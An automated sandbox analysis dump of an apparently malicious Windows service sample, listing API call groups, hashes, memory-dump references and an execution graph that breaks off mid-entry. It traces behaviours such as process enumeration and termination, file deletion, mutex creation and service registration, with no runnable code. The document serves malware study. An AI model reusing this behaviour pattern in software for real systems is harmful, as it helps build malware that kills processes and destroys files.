                                                                                                                                                                                                            • API ID: EnumServicesStatus$CloseErrorHandleLastManagerOpenService
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 1579346331-0
                                                                                                                                                                                                            • Opcode ID: 0759a2bcae14879d1550fdbe9e27605c3bea1956c73a3f714b4440dcaf09b39b
                                                                                                                                                                                                            • Instruction ID: 39cea7886abf54855b0b8c653a410f3a0fe7fd4647fda1ff6f43cedbc6c8d386
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 0759a2bcae14879d1550fdbe9e27605c3bea1956c73a3f714b4440dcaf09b39b
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 5AF142BAA01300DFC714CFE4FD856AA3BB4F799351B11C51AE542972B4E73588A3CB91
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • Sleep.KERNEL32(000003E8,00000001), ref: 009F9679
                                                                                                                                                                                                            • FindFirstFileA.KERNEL32(?,?), ref: 009F97B8
                                                                                                                                                                                                            • DeleteFileA.KERNEL32(?), ref: 009F98A9
                                                                                                                                                                                                            • FindNextFileA.KERNEL32(00000000,?), ref: 009F98CB
                                                                                                                                                                                                            • FindClose.KERNEL32(00000000), ref: 009F98E4
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.1322438878.00000000009D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 009D0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.1322410149.00000000009D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.1322480504.0000000000A07000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.1322500850.0000000000A0C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.1322500850.0000000000A49000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.1322500850.0000000000A5A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.1322570694.0000000000A5B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_9d0000_qbf30bzbv7f7qnhdav.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: FileFind$CloseDeleteFirstNextSleep
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 1528862845-0
                                                                                                                                                                                                            • Opcode ID: b5ec3635a9bf465298b857a510bd642f6a76ed862f0da6413d83a1655af61603
                                                                                                                                                                                                            • Instruction ID: b3690aa2fb8cf6e2d4f22f7b05300e487472cbd357cfe6224f2b083e8f164705
                                                                                                                                                                                                            • Opcode Fuzzy Hash: b5ec3635a9bf465298b857a510bd642f6a76ed862f0da6413d83a1655af61603
                                                                                                                                                                                                            • Instruction Fuzzy Hash: D091EF7E901304CBC704DFE4FC826A937B4FBDA311B00861AEA469B270EB768953CB51
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • RegisterServiceCtrlHandlerA.ADVAPI32(012A0610,Function_00011860), ref: 009E6D72
                                                                                                                                                                                                            • SetServiceStatus.ADVAPI32(00000000,00A405F8), ref: 009E6DD5
                                                                                                                                                                                                            • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 009E6DE9
                                                                                                                                                                                                            • SetServiceStatus.ADVAPI32(00000000,00A405F8), ref: 009E6E8A
                                                                                                                                                                                                            • WaitForSingleObject.KERNEL32(00000000,00001388), ref: 009E6EBE
                                                                                                                                                                                                            • SetServiceStatus.ADVAPI32(00000000,00A405F8), ref: 009E6F2B
                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 009E6F42
                                                                                                                                                                                                            • SetServiceStatus.ADVAPI32(00000000,00A405F8), ref: 009E6FAA
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.1322438878.00000000009D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 009D0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.1322410149.00000000009D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.1322480504.0000000000A07000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.1322500850.0000000000A0C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.1322500850.0000000000A49000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.1322500850.0000000000A5A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.1322570694.0000000000A5B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_9d0000_qbf30bzbv7f7qnhdav.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Service$Status$CloseCreateCtrlEventHandleHandlerObjectRegisterSingleWait
                                                                                                                                                                                                            • String ID: =ZMI
                                                                                                                                                                                                            • API String ID: 3399922960-150576250
                                                                                                                                                                                                            • Opcode ID: 4e0b9cbaf2cae9297906cbdaa18e65ee5f522d8c1e87ae6e07a9fdaa2412c5e3
                                                                                                                                                                                                            • Instruction ID: 36fc171f3ccf6bb2aaa2418f4384932fbc993af247088ba5b5b71f3ec1c5423c
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 4e0b9cbaf2cae9297906cbdaa18e65ee5f522d8c1e87ae6e07a9fdaa2412c5e3
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7391AA7C601311CBC304CFE9FD899A63BB5F7EA351702860AE556862B4C77A4863CF46
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 009E44A7
                                                                                                                                                                                                            • Process32First.KERNEL32(00000000,?), ref: 009E45C2
                                                                                                                                                                                                            • CreateToolhelp32Snapshot.KERNEL32(00000008,?), ref: 009E47CE
                                                                                                                                                                                                            • Module32First.KERNEL32(00000000,00000224), ref: 009E4842
                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000,0000000A), ref: 009E495A
                                                                                                                                                                                                            • Process32Next.KERNEL32(?,00000128), ref: 009E49AD
                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 009E4A20
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.1322438878.00000000009D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 009D0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.1322410149.00000000009D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.1322480504.0000000000A07000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.1322500850.0000000000A0C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.1322500850.0000000000A49000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.1322500850.0000000000A5A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.1322570694.0000000000A5B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_9d0000_qbf30bzbv7f7qnhdav.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: CloseCreateFirstHandleProcess32SnapshotToolhelp32$Module32Next
                                                                                                                                                                                                            • String ID: Eln_
                                                                                                                                                                                                            • API String ID: 930127669-3437842203
APIs
• CreateFileA.KERNEL32(?,80000000,?,00000000,00000003,00000000,00000000), ref: 009DCB20
• ReadFile.KERNEL32(00000000,?,?,?,00000000), ref: 009DCB5D
• CloseHandle.KERNEL32(00000000), ref: 009DCBBD
• GetTickCount.KERNEL32 ref: 009DCC1D
• CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000000,00000000), ref: 009DCED4
• WriteFile.KERNEL32(00000000,00000000,?,?,00000000), ref: 009DCF0E
• CloseHandle.KERNEL32(00000000), ref: 009DCF47
Memory Dump Source
• Source File: 00000002.00000002.1322438878.00000000009D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 009D0000, based on PE: true
Similarity
• API ID: File$CloseCreateHandle$CountReadTickWrite
• String ID:
• API String ID: 3478262135-0
APIs
• CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 009DBC90
• Process32First.KERNEL32(00000000,?), ref: 009DBCE3
• OpenProcess.KERNEL32(00000001,00000000,?), ref: 009DBDDD
Memory Dump Source
• Source File: 00000002.00000002.1322438878.00000000009D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 009D0000, based on PE: true
Similarity
• API ID: CreateFirstOpenProcessProcess32SnapshotToolhelp32
• String ID:
• API String ID: 3397401024-0
APIs
• CreateFileA.KERNEL32(?,00000000,00000000,00000000,00000003,00000000,00000000), ref: 009E15C3
• GetFileTime.KERNEL32(00000000,?,?,?), ref: 009E168A
• CloseHandle.KERNEL32(00000000), ref: 009E16A7
• __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 009E1715
• GetFileSize.KERNEL32(00000000,00000000,2AC18000,FE624E21,00989680,00000000), ref: 009E1774
• CloseHandle.KERNEL32(00000000), ref: 009E1792
Memory Dump Source
• Source File: 00000002.00000002.1322438878.00000000009D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 009D0000, based on PE: true
Similarity
• API ID: File$CloseHandle$CreateSizeTimeUnothrow_t@std@@@__ehfuncinfo$??2@
• String ID:
• API String ID: 3236713533-0
APIs
• OpenProcess.KERNEL32(00000001,00000000,?), ref: 009DBDDD
• TerminateProcess.KERNEL32(00000000,000000FF), ref: 009DBE24
• CloseHandle.KERNEL32(00000000), ref: 009DBE68
• Process32Next.KERNEL32(00000000,00000128), ref: 009DBF01
• CloseHandle.KERNEL32(00000000), ref: 009DBF2F
Memory Dump Source
• Source File: 00000002.00000002.1322438878.00000000009D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 009D0000, based on PE: true
Similarity
• API ID: CloseHandleProcess$NextOpenProcess32Terminate
• String ID:
• API String ID: 3173823348-0
APIs
• CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,?,009EE92E,009ECA40,00000000,?), ref: 00A054B2
• CreateThread.KERNEL32(00000000,00000000,00000000,?,00000000,00000000), ref: 00A054E4
• CloseHandle.KERNEL32(00000000,?,009EE92E,009ECA40,00000000,?), ref: 00A0551D
• WaitForSingleObject.KERNEL32(?,000000FF,?,009EE92E,009ECA40,00000000,?), ref: 00A05538
• CloseHandle.KERNEL32(?,?,000000FF,?,009EE92E,009ECA40,00000000,?), ref: 00A0554B
Memory Dump Source
• Source File: 00000002.00000002.1322438878.00000000009D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 009D0000, based on PE: true
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: CloseCreateHandle$EventObjectSingleThreadWait
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 1404307249-0
                                                                                                                                                                                                            • Opcode ID: 8a277dca0079699cd13d51235f3ce1015a06ef58d80e3a3829ce05631c50d865
                                                                                                                                                                                                            • Instruction ID: a63d974acd207500ddf0abeb92ba562bc76f4264d6b42d7bd2764c43d61e8f5c
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 8a277dca0079699cd13d51235f3ce1015a06ef58d80e3a3829ce05631c50d865
                                                                                                                                                                                                            • Instruction Fuzzy Hash: B631A938A05304DFD304CFA4ED89BA23BB5FB88711F10C119E5568B6B4E7758882CF91
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • SetServiceStatus.ADVAPI32(00000000,00A405F8), ref: 009E19BA
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.1322438878.00000000009D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 009D0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.1322410149.00000000009D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.1322480504.0000000000A07000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.1322500850.0000000000A0C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.1322500850.0000000000A49000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.1322500850.0000000000A5A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.1322570694.0000000000A5B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_9d0000_qbf30bzbv7f7qnhdav.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: ServiceStatus
                                                                                                                                                                                                            • String ID: uRh
                                                                                                                                                                                                            • API String ID: 3969395364-64653548
                                                                                                                                                                                                            • Opcode ID: a3c5390e2cd6c3449014e1d3af956b7e73a469c6ced39d7e36adad4e055c2650
                                                                                                                                                                                                            • Instruction ID: 39501b5aafe275bdba9f9e461ad02c1095b04c49f3719326e39a23c15991ba1c
                                                                                                                                                                                                            • Opcode Fuzzy Hash: a3c5390e2cd6c3449014e1d3af956b7e73a469c6ced39d7e36adad4e055c2650
                                                                                                                                                                                                            • Instruction Fuzzy Hash: FC31BA7E650205EFD304CFE9FC899A63BB9F7A9322305C526E1428A274C7359563DF12
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 009E21D0
                                                                                                                                                                                                            • Process32First.KERNEL32(00000000,00000128), ref: 009E2257
                                                                                                                                                                                                            • Process32Next.KERNEL32(00000000,00000128), ref: 009E2384
                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 009E2426
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.1322438878.00000000009D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 009D0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.1322410149.00000000009D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.1322480504.0000000000A07000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.1322500850.0000000000A0C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.1322500850.0000000000A49000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.1322500850.0000000000A5A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.1322570694.0000000000A5B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_9d0000_qbf30bzbv7f7qnhdav.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 420147892-0
                                                                                                                                                                                                            • Opcode ID: 0efa45bbd995fe1558bffb24a6a538b9e6c9e69d54a2f64297da26258fa6f7f3
                                                                                                                                                                                                            • Instruction ID: e75437920bc08bad092c8846306ac58625f4a46403d529159c7d5ea636e94847
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 0efa45bbd995fe1558bffb24a6a538b9e6c9e69d54a2f64297da26258fa6f7f3
                                                                                                                                                                                                            • Instruction Fuzzy Hash: EB910F79A10314CBD301DFE5FC89AA937B8FBE5350B118116D842962B4E77688A7CF51
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000,?,?,009E03A9,00000000,?), ref: 009E6957
                                                                                                                                                                                                            • RtlReAllocateHeap.NTDLL(00000000,?,009E03A9,00000000), ref: 009E695E
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,?,?,009E03A9,00000000,?), ref: 009E69C8
                                                                                                                                                                                                            • HeapAlloc.KERNEL32(00000000,?,009E03A9,00000000,?), ref: 009E69CF
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.1322438878.00000000009D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 009D0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.1322410149.00000000009D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.1322480504.0000000000A07000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.1322500850.0000000000A0C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.1322500850.0000000000A49000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.1322500850.0000000000A5A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.1322570694.0000000000A5B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_9d0000_qbf30bzbv7f7qnhdav.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Heap$Process$AllocAllocate
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 1154092256-0
                                                                                                                                                                                                            • Opcode ID: a3358e88340f454ca4486eed615a4da64efd142dbf207500728c1fd530be2205
                                                                                                                                                                                                            • Instruction ID: 5ed1d9f07ef732f8188e0e4ad0b32ae6f1a916f257116d31d5f832b33641254f
                                                                                                                                                                                                            • Opcode Fuzzy Hash: a3358e88340f454ca4486eed615a4da64efd142dbf207500728c1fd530be2205
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2721DCB9A41304DFD701DFE1FE89A953F38F796325B628504E489922B5E73298A3CF10
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.1322438878.00000000009D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 009D0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.1322410149.00000000009D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.1322480504.0000000000A07000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.1322500850.0000000000A0C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.1322500850.0000000000A49000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.1322500850.0000000000A5A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.1322570694.0000000000A5B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_9d0000_qbf30bzbv7f7qnhdav.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID: XH$/
                                                                                                                                                                                                            • API String ID: 0-571299465
                                                                                                                                                                                                            • Opcode ID: d3133bfd3e7dfc905fa58a0a96d014ecce9b3e1dc54ebce8076dbeeef5851cb2
                                                                                                                                                                                                            • Instruction ID: 02a7f1bb2a9f4a03807c952a7c3f37af160c37ac0f938c0c7e01696f49b55b0b
                                                                                                                                                                                                            • Opcode Fuzzy Hash: d3133bfd3e7dfc905fa58a0a96d014ecce9b3e1dc54ebce8076dbeeef5851cb2
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 56F1FD39A01209CBC714EFE0FC92AFE77B8FB96311F00812AE546572A5EB714957CB51
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • GetSystemTime.KERNEL32(009F247D,00000001,?,?,009F247D), ref: 00A0518C
                                                                                                                                                                                                            • GetTickCount.KERNEL32 ref: 00A052BE
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.1322438878.00000000009D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 009D0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.1322410149.00000000009D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.1322480504.0000000000A07000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.1322500850.0000000000A0C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.1322500850.0000000000A49000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.1322500850.0000000000A5A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.1322570694.0000000000A5B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_9d0000_qbf30bzbv7f7qnhdav.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: CountSystemTickTime
                                                                                                                                                                                                            • String ID: @AB
                                                                                                                                                                                                            • API String ID: 2164215191-841575833
                                                                                                                                                                                                            • Opcode ID: 6ff71f60c067353a5fc774fb41a9646eace7bd5589e4139081fcb3840d0c675b
                                                                                                                                                                                                            • Instruction ID: 724428f13741904c1c5df704e34fdbcec56f72c9e405d4b671098175873124e9
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 6ff71f60c067353a5fc774fb41a9646eace7bd5589e4139081fcb3840d0c675b
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4851DE7AA01614CFC708DFE9FD8A5A63BB1F7983513058116E4828B2B4E77588A3CB85

Execution Graph

Execution Coverage: 15.7%
Dynamic/Decrypted Code Coverage: 0%
Signature Coverage: 0%
Total number of Nodes: 1717
Total number of Limit Nodes: 38
                                                                                                                                                                                                            execution_graph 9353 156c10 9355 156c21 RegisterServiceCtrlHandlerA 9353->9355 9356 156da2 SetServiceStatus CreateEventA 9355->9356 9357 156fc8 9355->9357 9358 156e58 SetServiceStatus 9356->9358 9359 156e3b 9356->9359 9360 156ea0 WaitForSingleObject 9358->9360 9359->9358 9360->9360 9361 156ecb 9360->9361 9363 163110 WaitForSingleObject 9361->9363 9364 156eff SetServiceStatus CloseHandle SetServiceStatus 9363->9364 9364->9357 10508 14e211 10509 14e240 ExitProcess 10508->10509 11135 15bf90 11138 15e140 11135->11138 11139 15e158 11138->11139 11140 160b00 8 API calls 11139->11140 11141 15bfb3 11140->11141 11142 164590 11143 1645bd 11142->11143 11144 160610 2 API calls 11143->11144 11145 1645c2 11144->11145 11146 16fde0 3 API calls 11145->11146 11147 1645ee 11146->11147 11148 165f98 11151 165706 11148->11151 11149 1686f1 11151->11149 11152 14d500 lstrlen 11151->11152 11152->11151 11084 14a307 11085 14a310 Sleep 11084->11085 11085->11085 10969 141080 10970 14108b 10969->10970 10973 160b00 10970->10973 10972 141117 10974 163f00 8 API calls 10973->10974 10975 160b1c 10974->10975 10975->10972 10976 142080 10977 142097 10976->10977 10978 160790 4 API calls 10977->10978 10979 1421e4 10978->10979 11153 14c980 11154 14c99d 11153->11154 11155 14e2c0 2 API calls 11154->11155 11156 14c9f6 11155->11156 11086 151500 11089 15ee60 11086->11089 11090 15b720 lstrlen 11089->11090 11091 15150f 11090->11091 11092 14bd08 11093 14bd10 11092->11093 11094 14a4e0 2 API calls 11093->11094 11095 14bdbb OpenProcess 11093->11095 11096 14bedd Process32Next 11093->11096 11099 14be67 CloseHandle 11093->11099 11094->11093 11095->11093 11097 14be02 TerminateProcess 11095->11097 11096->11093 11098 14bf19 CloseHandle 11096->11098 11097->11093 11097->11099 11101 14bf47 11098->11101 11099->11093 9365 174f8a 
9366 174ec5 9365->9366 9369 147a04 9366->9369 9370 151bb0 2 API calls 9369->9370 9371 147a18 9370->9371 9372 142f90 2 API calls 9371->9372 9373 147a60 9372->9373 9374 151bb0 2 API calls 9373->9374 9375 147aa7 9374->9375 9376 142f90 2 API calls 9375->9376 9377 147b0e 9376->9377 9378 151bb0 2 API calls 9377->9378 9379 147b22 9378->9379 9380 142f90 2 API calls 9379->9380 9381 147bad 9380->9381 9382 151bb0 2 API calls 9381->9382 9383 147bc3 9382->9383 9384 142f90 2 API calls 9383->9384 9385 147c07 9384->9385 9386 151bb0 2 API calls 9385->9386 9387 147c7a 9386->9387 9388 142f90 2 API calls 9387->9388 9389 147cb7 9388->9389 9390 151bb0 2 API calls 9389->9390 9391 147d1b 9390->9391 9392 142f90 2 API calls 9391->9392 9393 147d90 9392->9393 9394 151bb0 2 API calls 9393->9394 9395 147da6 9394->9395 9396 142f90 2 API calls 9395->9396 9397 147dfc 9396->9397 9398 151bb0 2 API calls 9397->9398 9399 147e1a 9398->9399 9400 142f90 2 API calls 9399->9400 9401 147e73 9400->9401 9402 151bb0 2 API calls 9401->9402 9403 147e87 9402->9403 9404 142f90 2 API calls 9403->9404 9405 147ef1 9404->9405 9406 151bb0 2 API calls 9405->9406 9407 147f05 9406->9407 9408 142f90 2 API calls 9407->9408 9409 147f42 9408->9409 9410 151bb0 2 API calls 9409->9410 9411 147f62 9410->9411 9412 142f90 2 API calls 9411->9412 9413 147fe8 9412->9413 9414 151bb0 2 API calls 9413->9414 9415 148004 9414->9415 9416 142f90 2 API calls 9415->9416 9417 148093 9416->9417 9418 151bb0 2 API calls 9417->9418 9419 1480a7 9418->9419 9420 142f90 2 API calls 9419->9420 9421 148106 9420->9421 9422 151bb0 2 API calls 9421->9422 9423 14818f 9422->9423 9424 142f90 2 API calls 9423->9424 9425 1481d1 9424->9425 9426 151bb0 2 API calls 9425->9426 9427 1481eb 9426->9427 9428 142f90 2 API calls 9427->9428 9429 148230 9428->9429 9430 151bb0 2 API calls 9429->9430 9431 148268 9430->9431 9432 151bb0 2 API calls 9431->9432 9433 1482b6 9432->9433 9434 152eb0 2 API calls 9433->9434 9435 148388 9434->9435 9614 1750e0 9435->9614 9437 14839b 9438 
142f90 2 API calls 9437->9438 9439 1483c0 GetEnvironmentVariableA 9438->9439 9440 151bb0 2 API calls 9439->9440 9441 1483f9 CreateMutexA 9440->9441 9443 148480 CreateMutexA CreateMutexA 9441->9443 9445 148521 9443->9445 9446 148587 GetTickCount 9445->9446 9447 14868b 9445->9447 9449 1485a5 9446->9449 9621 155200 9447->9621 9451 142f90 2 API calls 9449->9451 9450 1486a4 GetCommandLineA 9452 1486cb 9450->9452 9454 1485bd 9451->9454 9453 142f90 2 API calls 9452->9453 9455 14874d 9453->9455 9456 151bb0 2 API calls 9454->9456 9458 151bb0 2 API calls 9455->9458 9457 148622 9456->9457 9457->9447 9459 14878c 9458->9459 9460 149235 GetCommandLineA 9459->9460 9462 142f90 2 API calls 9459->9462 9723 16b990 9460->9723 9464 1487dd 9462->9464 9465 151bb0 2 API calls 9464->9465 9467 148812 9465->9467 9466 149271 9726 14d500 lstrlen 9466->9726 9469 148842 9467->9469 9470 148832 9467->9470 9474 142f90 2 API calls 9469->9474 9891 142800 9470->9891 9472 149323 GetModuleFileNameA 9727 14a4e0 lstrlen 9472->9727 9475 1488ab 9474->9475 9477 151bb0 2 API calls 9475->9477 9476 1493ae 9479 14a4e0 2 API calls 9476->9479 9478 1488db 9477->9478 9480 148926 9478->9480 9481 148902 9478->9481 9482 14945a 9479->9482 9485 14e430 lstrlen 9480->9485 9483 142800 ExitProcess 9481->9483 9484 14a4e0 2 API calls 9482->9484 9483->9480 9500 14947b 9484->9500 9486 148961 9485->9486 9487 142f90 2 API calls 9486->9487 9488 148978 9487->9488 9492 151bb0 2 API calls 9488->9492 9489 149744 9730 163cf0 9489->9730 9491 1497b2 9493 1497d4 9491->9493 9494 1497b9 9491->9494 9516 1489cb 9492->9516 9739 169b00 9493->9739 9495 142800 ExitProcess 9494->9495 9495->9493 9497 14981d 9833 1708b0 GetSystemTimeAsFileTime 9497->9833 9499 149830 9835 1648d0 9499->9835 9500->9489 9917 158a70 9500->9917 9503 152120 6 API calls 9503->9516 9504 14956f 9923 169580 9504->9923 9506 151530 CreateFileA GetFileTime CloseHandle GetFileSize CloseHandle 9521 148b46 9506->9521 9507 14971a 9509 142800 ExitProcess 9507->9509 9508 1708b0 
